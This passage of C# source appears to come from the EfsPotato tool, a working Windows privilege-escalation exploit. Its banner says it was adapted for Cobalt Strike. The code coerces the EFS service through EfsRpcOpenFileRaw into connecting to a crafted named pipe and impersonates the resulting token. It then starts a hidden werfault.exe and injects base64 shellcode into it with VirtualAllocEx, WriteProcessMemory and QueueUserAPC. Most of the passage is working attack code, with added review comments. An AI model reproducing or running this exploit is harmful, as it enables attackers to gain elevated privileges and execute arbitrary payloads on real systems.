    private static extern Int32 RpcBindingSetOption(IntPtr Binding, UInt32 Option, IntPtr OptionValue);

    [DllImport("Rpcrt4.dll", EntryPoint = "NdrClientCall2", CallingConvention = CallingConvention.Cdecl, CharSet = CharSet.Unicode, SetLastError = false)]
    internal static extern IntPtr NdrClientCall2x64(IntPtr pMIDL_STUB_DESC, IntPtr formatString, IntPtr binding, out IntPtr hContext, string FileName, int Flags);

    // MIDL-generated NDR format strings, one proc/type pair per bitness. They
    // are opaque to this class: the constructor selects a pair by IntPtr.Size
    // and GetProcStringHandle hands out a byte offset into the proc string.
    private static byte[] MIDL_ProcFormatStringx86 = new byte[] { 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x14, 0x00, 0x32, 0x00, 0x00, 0x00, 0x08, 0x00, 0x40, 0x00, 0x46, 0x04, 0x08, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x01, 0x04, 0x00, 0x06, 0x00, 0x0b, 0x01, 0x08, 0x00, 0x0c, 0x00, 0x48, 0x00, 0x0c, 0x00, 0x08, 0x00, 0x70, 0x00, 0x10, 0x00, 0x08, 0x00, 0x00, 0x00 };

    private static byte[] MIDL_ProcFormatStringx64 = new byte[] { 0x00, 0x00, 0x00, 0x48, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x28, 0x00, 0x32, 0x00, 0x00, 0x00, 0x08, 0x00, 0x40, 0x00, 0x46, 0x04, 0x0a, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x01, 0x08, 0x00, 0x06, 0x00, 0x0b, 0x01, 0x10, 0x00, 0x0c, 0x00, 0x48, 0x00, 0x18, 0x00, 0x08, 0x00, 0x70, 0x00, 0x20, 0x00, 0x08, 0x00, 0x00, 0x00 };

    private static byte[] MIDL_TypeFormatStringx86 = new byte[] { 0x00, 0x00, 0x00, 0x00, 0x11, 0x04, 0x02, 0x00, 0x30, 0xa0, 0x00, 0x00, 0x11, 0x08, 0x25, 0x5c, 0x00, 0x00 };

    private static byte[] MIDL_TypeFormatStringx64 = new byte[] { 0x00, 0x00, 0x00, 0x00, 0x11, 0x04, 0x02, 0x00, 0x30, 0xa0, 0x00, 0x00, 0x11, 0x08, 0x25, 0x5c, 0x00, 0x00 };
    // Interface UUID that Bind passes to RpcStringBindingCompose; assigned in
    // the constructor.
    Guid interfaceId;

    /// <summary>
    /// Builds the stub for interface c681d488-d850-11d0-8c52-00c04fd90f7e,
    /// version 1.0, on the \pipe\lsarpc endpoint, choosing the x64 or x86
    /// format strings by IntPtr.Size.
    /// </summary>
    public EfsrTiny()
    {
        interfaceId = new Guid("c681d488-d850-11d0-8c52-00c04fd90f7e");
        if (IntPtr.Size == 8)
        {
            InitializeStub(interfaceId, MIDL_ProcFormatStringx64, MIDL_TypeFormatStringx64, "\\pipe\\lsarpc", 1, 0);
        }
        else
        {
            InitializeStub(interfaceId, MIDL_ProcFormatStringx86, MIDL_TypeFormatStringx86, "\\pipe\\lsarpc", 1, 0);
        }
    }

    // Finalizer releasing the pinned handles taken in InitializeStub.
    // NOTE(review): GCHandle.Free throws InvalidOperationException on a
    // handle that was never allocated, so if the constructor failed part-way
    // this throws on the finalizer thread. An IDisposable implementation
    // that checks IsAllocated before each Free would be the safer shape.
    ~EfsrTiny()
    {
        freeStub();
    }
    /// <summary>
    /// Calls the stub's method at proc-format offset 2 against "localhost".
    /// </summary>
    /// <param name="hContext">
    /// Receives the context handle returned by the server; reset to
    /// IntPtr.Zero before the call.
    /// </param>
    /// <param name="FileName">File name argument, marshaled as a Unicode string.</param>
    /// <param name="Flags">
    /// Flags argument. NOTE(review): only forwarded on the x64 path; the x86
    /// path passes IntPtr.Zero in its place (see below).
    /// </param>
    /// <returns>
    /// The NdrClientCall2 return value truncated to int, or — if the call
    /// raised an SEHException — the exception code, which is also printed.
    /// </returns>
    public int EfsRpcOpenFileRaw(out IntPtr hContext, string FileName, int Flags)
    {
        IntPtr result = IntPtr.Zero;
        // Unmanaged copy of FileName for the x86 argument array; freed in the
        // finally block. On x64 the P/Invoke marshals FileName itself and pfn
        // is allocated but unused.
        IntPtr pfn = Marshal.StringToHGlobalUni(FileName);

        hContext = IntPtr.Zero;
        try
        {
            if (IntPtr.Size == 8)
            {
                // Bind receives a freshly allocated HGlobal copy of "localhost"
                // that is never freed, and the binding handle it returns is
                // never released with RpcBindingFree: both leak once per call.
                result = NdrClientCall2x64(GetStubHandle(), GetProcStringHandle(2), Bind(Marshal.StringToHGlobalUni("localhost")), out hContext, FileName, Flags);
            }
            else
            {
                // tempValue is pinned so the callee can write the context
                // handle through its address; the same "localhost"/binding
                // leak as on the x64 path applies here.
                IntPtr tempValue = IntPtr.Zero;
                GCHandle handle = GCHandle.Alloc(tempValue, GCHandleType.Pinned);
                IntPtr tempValuePointer = handle.AddrOfPinnedObject();
                try
                {
                    // Argument order: binding, &hContext, FileName, Flags.
                    // The last slot is a literal IntPtr.Zero, so the Flags
                    // parameter is not forwarded on this path.
                    result = CallNdrClientCall2x86(2, Bind(Marshal.StringToHGlobalUni("localhost")), tempValuePointer, pfn, IntPtr.Zero);
                    // each pinvoke work on a copy of the arguments (without an out specifier)
                    // get back the data
                    hContext = Marshal.ReadIntPtr(tempValuePointer);
                }
                finally
                {
                    handle.Free();
                }
            }
        }
        catch (SEHException)
        {
            // RPC faults surface as SEH exceptions; the exception code is
            // presumably the RPC status — confirm against the RPC runtime docs.
            int err = Marshal.GetExceptionCode();
            Console.WriteLine("[x] EfsRpcOpenFileRaw failed: " + err);
            return err;
        }
        finally
        {
            if (pfn != IntPtr.Zero)
                Marshal.FreeHGlobal(pfn);
        }
        return (int)result.ToInt64();
    }
    // Per-instance copies of the selected format strings plus the pinned
    // handles that keep them and the stub structures at fixed addresses for
    // the lifetime of the object (allocated in InitializeStub, released in
    // freeStub).
    private byte[] MIDL_ProcFormatString;
    private byte[] MIDL_TypeFormatString;
    private GCHandle procString;
    private GCHandle formatString;
    private GCHandle stub;
    private GCHandle faultoffsets;
    private GCHandle clientinterface;
    private string PipeName;

    // Held in instance fields so the delegates remain reachable while native
    // code holds the function pointers taken from them in InitializeStub; a
    // collected delegate would leave the stub with dangling pointers.
    allocmemory AllocateMemoryDelegate = AllocateMemory;
    freememory FreeMemoryDelegate = FreeMemory;

    // Call timeout applied in Bind through RpcBindingSetOption option 12
    // (RPC_C_OPT_CALL_TIMEOUT in rpcdce.h, value in milliseconds).
    public UInt32 RPCTimeOut = 5000;

    /// <summary>
    /// Pins the format strings and builds the RPC_CLIENT_INTERFACE,
    /// COMM_FAULT_OFFSETS and MIDL_STUB_DESC structures (types declared
    /// outside this file) that NdrClientCall2 reads.
    /// </summary>
    /// <param name="interfaceID">Interface UUID for the client interface.</param>
    /// <param name="MIDL_ProcFormatString">NDR procedure format string; pinned as procString.</param>
    /// <param name="MIDL_TypeFormatString">NDR type format string; pinned as formatString.</param>
    /// <param name="pipe">Named-pipe endpoint used by Bind.</param>
    /// <param name="MajorVerson">Interface major version.</param>
    /// <param name="MinorVersion">Interface minor version.</param>
    protected void InitializeStub(Guid interfaceID, byte[] MIDL_ProcFormatString, byte[] MIDL_TypeFormatString, string pipe, ushort MajorVerson, ushort MinorVersion)
    {
        this.MIDL_ProcFormatString = MIDL_ProcFormatString;
        this.MIDL_TypeFormatString = MIDL_TypeFormatString;
        PipeName = pipe;
        procString = GCHandle.Alloc(this.MIDL_ProcFormatString, GCHandleType.Pinned);

        RPC_CLIENT_INTERFACE clientinterfaceObject = new RPC_CLIENT_INTERFACE(interfaceID, MajorVerson, MinorVersion);

        // -1 presumably marks "no comm/fault status parameter" for this proc
        // — confirm against the MIDL documentation for COMM_FAULT_OFFSETS.
        COMM_FAULT_OFFSETS commFaultOffset = new COMM_FAULT_OFFSETS();
        commFaultOffset.CommOffset = -1;
        commFaultOffset.FaultOffset = -1;
        faultoffsets = GCHandle.Alloc(commFaultOffset, GCHandleType.Pinned);
        clientinterface = GCHandle.Alloc(clientinterfaceObject, GCHandleType.Pinned);
        // Pins the parameter, which is the same array instance just stored in
        // this.MIDL_TypeFormatString.
        formatString = GCHandle.Alloc(MIDL_TypeFormatString, GCHandleType.Pinned);

        MIDL_STUB_DESC stubObject = new MIDL_STUB_DESC(formatString.AddrOfPinnedObject(),
            clientinterface.AddrOfPinnedObject(),
            Marshal.GetFunctionPointerForDelegate(AllocateMemoryDelegate),
            Marshal.GetFunctionPointerForDelegate(FreeMemoryDelegate));

        stub = GCHandle.Alloc(stubObject, GCHandleType.Pinned);
    }


    // Releases the five pinned handles taken in InitializeStub; see the
    // finalizer note about Free on a never-allocated handle.
    protected void freeStub()
    {
        procString.Free();
        faultoffsets.Free();
        clientinterface.Free();
        formatString.Free();
        stub.Free();
    }

    // Allocator callback handed to the stub through MIDL_STUB_DESC.
    delegate IntPtr allocmemory(int size);

    protected static IntPtr AllocateMemory(int size)
    {
        IntPtr memory = Marshal.AllocHGlobal(size);
        return memory;
    }

    // Deallocator callback handed to the stub through MIDL_STUB_DESC.
    delegate void freememory(IntPtr memory);

    protected static void FreeMemory(IntPtr memory)
    {
        Marshal.FreeHGlobal(memory);
    }


    /// <summary>
    /// Composes an ncacn_np string binding for interfaceId on the server
    /// named by <paramref name="IntPtrserver"/> (a pointer to a Unicode
    /// string, which this method does not free) and PipeName, converts it to
    /// a binding handle and applies RPCTimeOut.
    /// </summary>
    /// <returns>
    /// The binding handle, or IntPtr.Zero when composing or converting the
    /// binding fails. A failing RpcBindingSetOption is printed and otherwise
    /// ignored. The returned handle is not tracked by this class; releasing
    /// it with RpcBindingFree is left to the caller (no caller in this file
    /// does).
    /// </returns>
    protected IntPtr Bind(IntPtr IntPtrserver)
    {
        string server = Marshal.PtrToStringUni(IntPtrserver);
        IntPtr bindingstring = IntPtr.Zero;
        IntPtr binding = IntPtr.Zero;
        Int32 status;
        status = RpcStringBindingCompose(interfaceId.ToString(), "ncacn_np", server, PipeName, null, out bindingstring);
        if (status != 0)
        {
            Console.WriteLine("[x] RpcStringBindingCompose failed with status 0x" + status.ToString("x"));
            return IntPtr.Zero;
        }
        status = RpcBindingFromStringBinding(Marshal.PtrToStringUni(bindingstring), out binding);
        // See the NOTE(review) on the RpcBindingFree import: this passes the
        // string binding, not a binding handle.
        RpcBindingFree(ref bindingstring);
        if (status != 0)
        {
            Console.WriteLine("[x] RpcBindingFromStringBinding failed with status 0x" + status.ToString("x"));
            return IntPtr.Zero;
        }

        // Option 12 = RPC_C_OPT_CALL_TIMEOUT; the value is passed by value in
        // the pointer slot, as the option expects.
        status = RpcBindingSetOption(binding, 12, new IntPtr(RPCTimeOut));
        if (status != 0)
        {
            Console.WriteLine("[x] RpcBindingSetOption failed with status 0x" + status.ToString("x"));
        }
        Console.WriteLine("[!] binding ok (handle=" + binding.ToString("x") + ")");
        return binding;
    }

    // Address of MIDL_ProcFormatString[offset]; valid because the array is
    // pinned by procString for the object's lifetime.
    protected IntPtr GetProcStringHandle(int offset)
    {
        return Marshal.UnsafeAddrOfPinnedArrayElement(MIDL_ProcFormatString, offset);
    }

    // Address of the pinned MIDL_STUB_DESC built in InitializeStub.
    protected IntPtr GetStubHandle()
    {
        return stub.AddrOfPinnedObject();
    }
    /// <summary>
    /// x86 driver for NdrClientCall2: pins <paramref name="args"/> and passes
    /// the array's address as the argument block, so the callee reads the
    /// arguments in array order. Out-parameters must be passed as pointers
    /// to pinned storage (see EfsRpcOpenFileRaw).
    /// </summary>
    /// <param name="offset">Byte offset into the proc format string.</param>
    /// <param name="args">Arguments in the order the proc expects them.</param>
    /// <returns>The NdrClientCall2 return value.</returns>
    protected IntPtr CallNdrClientCall2x86(int offset, params IntPtr[] args)
    {

        GCHandle stackhandle = GCHandle.Alloc(args, GCHandleType.Pinned);
        IntPtr result;
        try
        {
            result = NdrClientCall2x86(GetStubHandle(), GetProcStringHandle(offset), stackhandle.AddrOfPinnedObject());
        }
        finally
        {
            stackhandle.Free();
        }
        return result;
    }
}
216 | }
217 |
--------------------------------------------------------------------------------
/EfsPotato/Program.cs:
--------------------------------------------------------------------------------
1 | using System;
2 | using System.Runtime.InteropServices;
3 | using System.ComponentModel;
4 | using System.Threading;
5 | using System.Security.Principal;
6 | using Microsoft.Win32.SafeHandles;
7 | using static EfsPotato.APIDef;
8 |
9 |
10 | namespace EfsPotato
11 | {
/// <summary>
/// Console entry point of the EfsPotato local privilege-escalation chain. With
/// SeImpersonatePrivilege enabled on the current token it creates a uniquely named pipe,
/// drives the EFSRPC service into connecting to that pipe (EfsrTiny.EfsRpcOpenFileRaw on a
/// second thread), impersonates the connecting client, and under that token starts
/// werfault.exe and queues the base64 shellcode from args[0] into it as an APC.
/// </summary>
class Program
{
    /// <param name="args">args[0]: base64-encoded shellcode to run in the spawned process. Nothing else is read.</param>
    static void Main(string[] args)
    {
        Console.WriteLine("[+] Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability).");
        Console.WriteLine("[+] Part of GMH's fuck Tools, Code By zcgonvh, fixed by L.N. for cobaltstrike.");
        if (args.Length < 1)
        {
            // NOTE(review): the usage line carries no argument placeholder; a "<base64-shellcode>"
            // token was probably stripped by the page renderer. Confirm against upstream.
            Console.WriteLine("usage: EfsPotato ");
            Console.WriteLine();
            return;
        }
        // Enable SeImpersonatePrivilege on the current token. AdjustTokenPrivileges can only toggle
        // privileges the token already holds, so this doubles as the "do we have it at all" check.
        LUID_AND_ATTRIBUTES[] l = new LUID_AND_ATTRIBUTES[1];
        using (WindowsIdentity wi = WindowsIdentity.GetCurrent())
        {
            Console.WriteLine("[+] Current user: " + wi.Name);
            // NOTE(review): return value is not checked; a lookup failure leaves l[0].Luid zeroed.
            LookupPrivilegeValue(null, "SeImpersonatePrivilege", out l[0].Luid);
            TOKEN_PRIVILEGES tp = new TOKEN_PRIVILEGES();
            tp.PrivilegeCount = 1;
            tp.Privileges = l;
            l[0].Attributes = 2; // SE_PRIVILEGE_ENABLED
            // AdjustTokenPrivileges returns TRUE even when the privilege was not assigned and
            // signals that only through GetLastError (ERROR_NOT_ALL_ASSIGNED); hence the second
            // test. This relies on the P/Invoke being declared with SetLastError = true (APIDef not visible here).
            if (!AdjustTokenPrivileges(wi.Token, false, ref tp, Marshal.SizeOf(tp), IntPtr.Zero, IntPtr.Zero) || Marshal.GetLastWin32Error() != 0)
            {
                Console.WriteLine("[x] SeImpersonatePrivilege not held.");
                return;
            }
        }
        // Per-run random pipe name; the "\pipe\srvsvc" suffix is part of the path the EFS service
        // is steered into (see the path built in RpcThread).
        string g = Guid.NewGuid().ToString("d");
        string fake = @"\\.\pipe\" + g + @"\pipe\srvsvc";
        // 3 = PIPE_ACCESS_DUPLEX, pipe mode 0 = byte type / blocking, up to 10 instances,
        // 2 KiB in/out buffers, default security descriptor.
        var hPipe = CreateNamedPipe(fake, 3, 0, 10, 2048, 2048, 0, IntPtr.Zero);
        if (hPipe == new IntPtr(-1)) // INVALID_HANDLE_VALUE
        {
            Console.WriteLine("[x] can not create pipe: " + new Win32Exception(Marshal.GetLastWin32Error()).Message);
            return;
        }
        // The race: one thread blocks in ConnectNamedPipe and sets mre when a client arrives,
        // the other issues the EFSRPC call that is expected to produce that connection.
        ManualResetEvent mre = new ManualResetEvent(false);
        var tn = new Thread(NamedPipeThread);
        tn.IsBackground = true;
        tn.Start(new object[] { hPipe, mre });
        var tn2 = new Thread(RpcThread);
        tn2.IsBackground = true;
        tn2.Start(g);
        if (mre.WaitOne(1000)) // one second for the service to connect
        {
            if (ImpersonateNamedPipeClient(hPipe))
            {
                // This thread now impersonates the pipe client, so GetCurrent() yields that token.
                // NOTE(review): the WindowsIdentity is never disposed, tkn is never closed (the
                // commented-out path below did CloseHandle(tkn)), and there is no RevertToSelf —
                // the thread stays impersonated until the process exits.
                IntPtr tkn = WindowsIdentity.GetCurrent().Token;
                Console.WriteLine("[+] Get Token: " + tkn);
                SECURITY_ATTRIBUTES sa = new SECURITY_ATTRIBUTES();
                sa.nLength = Marshal.SizeOf(sa);
                sa.pSecurityDescriptor = IntPtr.Zero;
                sa.bInheritHandle = 1;
                IntPtr hRead, hWrite;
                // NOTE(review): return value unchecked, and hRead/hWrite are never closed on this path.
                // The pipe only serves as the child's stdout/stderr; nothing reads it (ReadThread is commented out).
                CreatePipe(out hRead, out hWrite, ref sa, 1024);
                PROCESS_INFORMATION pi = new PROCESS_INFORMATION();
                STARTUPINFO si = new STARTUPINFO();
                si.cb = Marshal.SizeOf(si);
                si.hStdError = hWrite;
                si.hStdOutput = hWrite;
                si.lpDesktop = "WinSta0\\Default";
                si.dwFlags = 0x101; // STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW
                si.wShowWindow = 0; // SW_HIDE
                // Original zcgonvh behaviour (run args[0] as a command line and relay its output) kept for reference.
                //if (CreateProcessAsUser(tkn, null, args[0], IntPtr.Zero, IntPtr.Zero, true, 0x08000000, IntPtr.Zero, IntPtr.Zero, ref si, out pi))
                //{
                //    Console.WriteLine("[!] process with pid: {0} created.\r\n==============================", pi.dwProcessId);
                //    tn = new Thread(ReadThread);
                //    tn.IsBackground = true;
                //    tn.Start(hRead);
                //    new ProcessWaitHandle(new SafeWaitHandle(pi.hProcess, false)).WaitOne(-1);
                //    tn.Abort();
                //    CloseHandle(pi.hProcess);
                //    CloseHandle(pi.hThread);
                //    CloseHandle(tkn);
                //    CloseHandle(hWrite);
                //    CloseHandle(hRead);
                //}

                // The host ("puppet") process used here is werfault.exe; it can be changed.
                // 0x08000000 = CREATE_NO_WINDOW. NOTE(review): CREATE_SUSPENDED (0x4) is not part of
                // the flags, so the child's primary thread starts running immediately (see ResumeThread below).
                if (CreateProcessAsUser(tkn, @"c:\Windows\System32\werfault.exe", null, IntPtr.Zero, IntPtr.Zero, true, 0x08000000, IntPtr.Zero, IntPtr.Zero, ref si, out pi))
                {

                    // Read the shellcode: args[0] is a base64 string.
                    // NOTE(review): decoding happens only after the child exists; a malformed
                    // argument throws FormatException here and leaves werfault.exe running.
                    // Validating args[0] before the pipe/race setup would avoid that.
                    string shellcode = args[0];
                    byte[] b_shellcode = Convert.FromBase64String(shellcode);

                    // Allocate memory as PAGE_READWRITE.
                    // NOTE(review): resultPtr is never checked for IntPtr.Zero before being used.
                    IntPtr resultPtr = VirtualAllocEx(pi.hProcess, IntPtr.Zero, b_shellcode.Length, MEM_COMMIT, PAGE_READWRITE);
                    IntPtr bytesWritten = IntPtr.Zero;

                    // Write the shellcode.
                    //Marshal.Copy(b_shellcode, 0, resultPtr, b_shellcode.Length);
                    // NOTE(review): resultBool and bytesWritten are never inspected.
                    bool resultBool = WriteProcessMemory(pi.hProcess, resultPtr, b_shellcode, b_shellcode.Length, out bytesWritten);

                    // Open the child's primary thread with SET_CONTEXT access (what QueueUserAPC requires).
                    // NOTE(review): sht is neither validated nor closed; pi.hThread already refers to this thread.
                    IntPtr sht = OpenThread(ThreadAccess.SET_CONTEXT, false, (int)pi.dwThreadId);
                    uint oldProtect = 0;

                    // Change the memory protection to PAGE_EXECUTE_READ. NOTE(review): result unchecked.
                    resultBool = VirtualProtectEx(pi.hProcess, resultPtr, b_shellcode.Length, PAGE_EXECUTE_READ, out oldProtect);

                    // Queue the shellcode address as an APC on that thread. NOTE(review): return value unchecked.
                    IntPtr ptr = QueueUserAPC(resultPtr, sht, IntPtr.Zero);

                    // NOTE(review): the thread was not created suspended (see the creation flags above),
                    // so this ResumeThread has no suspend count to decrement; confirm the intended flags.
                    IntPtr ThreadHandle = pi.hThread;
                    ResumeThread(ThreadHandle);

                    // NOTE(review): pi.hProcess and pi.hThread are never closed.
                    Console.WriteLine("[!] process with pid: {0} created.\r\n", pi.dwProcessId);
                }
            }
            // NOTE(review): an ImpersonateNamedPipeClient failure falls through silently — no message is printed.
        }
        else
        {
            Console.WriteLine("[x] operation timed out.");
            // Opening our own pipe as a client (GENERIC_WRITE = 0x40000000, OPEN_EXISTING = 3,
            // FILE_ATTRIBUTE_NORMAL = 0x80) completes the pending ConnectNamedPipe so
            // NamedPipeThread can return; the returned handle is discarded.
            CreateFile(fake, 1073741824, 0, IntPtr.Zero, 3, 0x80, IntPtr.Zero);//force cancel async operation
        }
        CloseHandle(hPipe);
    }

    // Output relay for the original command-execution variant; unused by the shellcode variant above.
    //static void ReadThread(object o)
    //{
    //    IntPtr p = (IntPtr)o;
    //    FileStream fs = new FileStream(p, FileAccess.Read, false);
    //    StreamReader sr = new StreamReader(fs, Console.OutputEncoding);
    //    while (true)
    //    {
    //        string s = sr.ReadLine();
    //        if (s == null) { break; }
    //        Console.WriteLine(s);
    //    }
    //}
    /// <summary>
    /// EFSRPC side of the race. Calls EfsRpcOpenFileRaw with a UNC-style path built from the pipe
    /// GUID chosen in Main; the path is crafted so that the EFS service, while handling the call,
    /// connects to the pipe created in Main. The exact canonicalisation happens inside the service
    /// and is not visible here. Any exception is printed and swallowed: the outcome is observed by
    /// Main through the pipe connect, not through this call's result.
    /// </summary>
    /// <param name="o">The pipe GUID string, as passed to Thread.Start.</param>
    static void RpcThread(object o)
    {
        string g = o as string;
        EfsrTiny r = new EfsrTiny();
        IntPtr hHandle = IntPtr.Zero;
        try
        {
            // NOTE(review): hHandle is never inspected or released, and r is not explicitly torn down
            // (whether EfsrTiny needs disposal is not visible in this excerpt).
            r.EfsRpcOpenFileRaw(out hHandle, "\\\\localhost/PIPE/" + g + "/\\" + g + "\\" + g, 0);
        }
        catch (Exception ex)
        {
            Console.WriteLine(ex);
        }
    }

    /// <summary>
    /// Pipe-server side of the race. Blocks in ConnectNamedPipe on the handle created in Main and
    /// sets the event once the call returns (the return value is not checked, so a failed connect
    /// also signals). Expects an object[] { IntPtr pipe, ManualResetEvent mre }.
    /// NOTE(review): only the event slot is null-checked; if o is not an object[] the cast yields
    /// null and objs[0] throws NullReferenceException on this background thread.
    /// </summary>
    /// <param name="o">object[] holding the pipe handle and the event to signal.</param>
    static void NamedPipeThread(object o)
    {
        object[] objs = o as object[];
        IntPtr pipe = (IntPtr)objs[0];
        ManualResetEvent mre = objs[1] as ManualResetEvent;
        if (mre != null)
        {
            ConnectNamedPipe(pipe, IntPtr.Zero);
            mre.Set();
        }
    }


}
171 | //copy from bcl
/// <summary>
/// Minimal WaitHandle wrapper around a raw process handle, mirroring the BCL-internal helper
/// ("copy from bcl"). Only referenced from the commented-out command-execution path in
/// Program.Main; the active shellcode path does not use it.
/// </summary>
internal class ProcessWaitHandle : WaitHandle
{
    /// <param name="processHandle">Handle to wait on; whether it is closed on dispose follows the SafeWaitHandle's ownsHandle flag.</param>
    internal ProcessWaitHandle(SafeWaitHandle processHandle)
    {
        this.SafeWaitHandle = processHandle;
    }
}
179 |
180 |
/// <summary>
/// Mirror of the native COMM_FAULT_OFFSETS pair (two 16-bit offsets) that
/// MIDL_STUB_DESC.CommFaultOffsets may point to. In the visible code that pointer is
/// set to IntPtr.Zero and this struct is never instantiated; the EfsrTiny side owns a
/// 'faultoffsets' GCHandle (see freeStub) whose contents are outside this excerpt.
/// </summary>
[StructLayout(LayoutKind.Sequential)]
struct COMM_FAULT_OFFSETS
{
    public short CommOffset;  // presumably the comm-status parameter offset; not exercised here
    public short FaultOffset; // presumably the fault-status parameter offset; not exercised here
}
187 |
/// <summary>
/// Major/minor version pair of an RPC interface or transfer syntax (native RPC_VERSION:
/// two consecutive 16-bit fields, 4 bytes total). Embedded in RPC_SYNTAX_IDENTIFIER.
/// </summary>
[StructLayout(LayoutKind.Sequential)]
struct RPC_VERSION
{
    public ushort MajorVersion;
    public ushort MinorVersion;

    /// <summary>Initialises both halves of the version.</summary>
    /// <param name="InterfaceVersionMajor">Value stored in MajorVersion.</param>
    /// <param name="InterfaceVersionMinor">Value stored in MinorVersion.</param>
    public RPC_VERSION(ushort InterfaceVersionMajor, ushort InterfaceVersionMinor)
    {
        this.MajorVersion = InterfaceVersionMajor;
        this.MinorVersion = InterfaceVersionMinor;
    }
}
199 |
/// <summary>
/// Mirror of the native RPC_SYNTAX_IDENTIFIER: a UUID followed by an RPC_VERSION.
/// RPC_CLIENT_INTERFACE holds two of these — the interface id (UUID + interface version)
/// and the transfer syntax (IID_SYNTAX, version 2.0). Field order is the interop contract.
/// </summary>
[StructLayout(LayoutKind.Sequential)]
struct RPC_SYNTAX_IDENTIFIER
{
    public Guid SyntaxGUID;         // interface or transfer-syntax UUID
    public RPC_VERSION SyntaxVersion; // major/minor version that goes with it
}
206 |
/// <summary>
/// Managed mirror of the native RPC_CLIENT_INTERFACE record that the NDR runtime reaches
/// through MIDL_STUB_DESC.RpcInterfaceInformation. Field order and widths are the interop
/// contract with rpcrt4 — do not reorder or retype them. IID_SYNTAX is static and therefore
/// not part of the marshaled layout.
/// </summary>
[StructLayout(LayoutKind.Sequential)]
struct RPC_CLIENT_INTERFACE
{
    public uint Length;                                   // sizeof(RPC_CLIENT_INTERFACE), filled by the constructor
    public RPC_SYNTAX_IDENTIFIER InterfaceId;             // UUID + version of the remote interface
    public RPC_SYNTAX_IDENTIFIER TransferSyntax;          // always NDR (IID_SYNTAX) 2.0 here
    public IntPtr /*PRPC_DISPATCH_TABLE*/ DispatchTable;  // left null
    public uint RpcProtseqEndpointCount;                  // 0
    public IntPtr /*PRPC_PROTSEQ_ENDPOINT*/ RpcProtseqEndpoint; // left null
    public IntPtr Reserved;
    public IntPtr InterpreterInfo;                        // left null
    public uint Flags;                                    // 0

    /// <summary>UUID of the NDR transfer syntax, 8a885d04-1ceb-11c9-9fe8-08002b104860.</summary>
    public static Guid IID_SYNTAX = new Guid(0x8A885D04u, 0x1CEB, 0x11C9, 0x9F, 0xE8, 0x08, 0x00, 0x2B, 0x10, 0x48, 0x60);

    /// <summary>
    /// Builds a client-interface record for <paramref name="iid"/> at the given interface
    /// version, using the NDR 2.0 transfer syntax and clearing every optional pointer and count.
    /// </summary>
    /// <param name="iid">UUID of the interface to call.</param>
    /// <param name="InterfaceVersionMajor">Interface major version.</param>
    /// <param name="InterfaceVersionMinor">Interface minor version.</param>
    public RPC_CLIENT_INTERFACE(Guid iid, ushort InterfaceVersionMajor, ushort InterfaceVersionMinor)
    {
        Length = (uint)Marshal.SizeOf(typeof(RPC_CLIENT_INTERFACE));
        InterfaceId = new RPC_SYNTAX_IDENTIFIER
        {
            SyntaxGUID = iid,
            SyntaxVersion = new RPC_VERSION(InterfaceVersionMajor, InterfaceVersionMinor)
        };
        TransferSyntax = new RPC_SYNTAX_IDENTIFIER
        {
            SyntaxGUID = IID_SYNTAX,
            SyntaxVersion = new RPC_VERSION(2, 0)
        };
        DispatchTable = IntPtr.Zero;
        RpcProtseqEndpointCount = 0u;
        RpcProtseqEndpoint = IntPtr.Zero;
        Reserved = IntPtr.Zero;
        InterpreterInfo = IntPtr.Zero;
        Flags = 0u;
    }
}
241 |
/// <summary>
/// Managed mirror of the native MIDL_STUB_DESC that NdrClientCall2 receives (see
/// EfsrTiny.GetStubHandle). Field order and widths are the interop contract with rpcrt4 and
/// must not change. The constructor stores the four caller-supplied pointers, fixes the
/// version/flag constants, and zeroes every optional routine table.
/// </summary>
[StructLayout(LayoutKind.Sequential)]
struct MIDL_STUB_DESC
{
    public IntPtr /*RPC_CLIENT_INTERFACE*/ RpcInterfaceInformation; // -> RPC_CLIENT_INTERFACE record
    public IntPtr pfnAllocate;                                        // allocator callback (presumably AllocateMemory)
    public IntPtr pfnFree;                                            // deallocator callback (presumably FreeMemory)
    public IntPtr pAutoBindHandle;
    public IntPtr /*NDR_RUNDOWN*/ apfnNdrRundownRoutines;
    public IntPtr /*GENERIC_BINDING_ROUTINE_PAIR*/ aGenericBindingRoutinePairs;
    public IntPtr /*EXPR_EVAL*/ apfnExprEval;
    public IntPtr /*XMIT_ROUTINE_QUINTUPLE*/ aXmitQuintuple;
    public IntPtr pFormatTypes;                                       // type format string
    public int fCheckBounds;                                          // set to 1 (name suggests NDR bounds checking)
    /* Ndr library version. */
    public uint Version;                                              // 0x50002 (reads as NDR 5.2)
    public IntPtr /*MALLOC_FREE_STRUCT*/ pMallocFreeStruct;
    public int MIDLVersion;                                           // 0x801026e (reads as MIDL 8.01.0622)
    public IntPtr CommFaultOffsets;                                   // left null: no comm/fault status parameters
    // New fields for version 3.0+
    public IntPtr /*USER_MARSHAL_ROUTINE_QUADRUPLE*/ aUserMarshalQuadruple;
    // Notify routines - added for NT5, MIDL 5.0
    public IntPtr /*NDR_NOTIFY_ROUTINE*/ NotifyRoutineTable;
    public IntPtr mFlags;                                             // set to 1
    // International support routines - added for 64bit post NT5
    public IntPtr /*NDR_CS_ROUTINES*/ CsRoutineTables;
    public IntPtr ProxyServerInfo;
    public IntPtr /*NDR_EXPR_DESC*/ pExprInfo;
    // Fields up to now present in win2000 release.

    /// <summary>Populates the descriptor; every table pointer not passed in is IntPtr.Zero.</summary>
    /// <param name="pFormatTypesPtr">Stored in pFormatTypes.</param>
    /// <param name="RpcInterfaceInformationPtr">Stored in RpcInterfaceInformation.</param>
    /// <param name="pfnAllocatePtr">Stored in pfnAllocate.</param>
    /// <param name="pfnFreePtr">Stored in pfnFree.</param>
    public MIDL_STUB_DESC(IntPtr pFormatTypesPtr, IntPtr RpcInterfaceInformationPtr,
        IntPtr pfnAllocatePtr, IntPtr pfnFreePtr)
    {
        // Assignments follow declaration order; they are independent of one another.
        RpcInterfaceInformation = RpcInterfaceInformationPtr;
        pfnAllocate = pfnAllocatePtr;
        pfnFree = pfnFreePtr;
        pAutoBindHandle = IntPtr.Zero;
        apfnNdrRundownRoutines = IntPtr.Zero;
        aGenericBindingRoutinePairs = IntPtr.Zero;
